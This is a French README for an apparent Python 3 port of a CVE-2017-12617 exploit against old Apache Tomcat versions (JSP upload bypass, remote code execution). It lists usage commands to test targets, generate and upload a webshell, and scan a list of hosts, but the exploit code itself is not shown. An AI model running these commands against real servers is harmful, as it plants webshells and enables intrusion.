
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - Contournement du téléchargement JSP / Exécution de code à distance pour Python3
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - Contournement de téléchargement JSP / Exécution de code à distance pour Python3
J'ai juste apporté quelques ajustements au script original pour le rendre compatible avec Python 3 !
Si vous rencontrez des problèmes ou des difficultés, n'hésitez pas à m'envoyer un email à [email protected] ou vous pouvez aussi m'envoyer un message si vous le souhaitez.
Ne jugez pas mon email, il sert de poubelle
./cve-2017-12617.py [options]
options:
-u ,--url [::] vérifier si l'URL cible est vulnérable
-p,--pwn [::] générer un webshell et le télécharger
-l,--list [::] liste d'hôtes
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt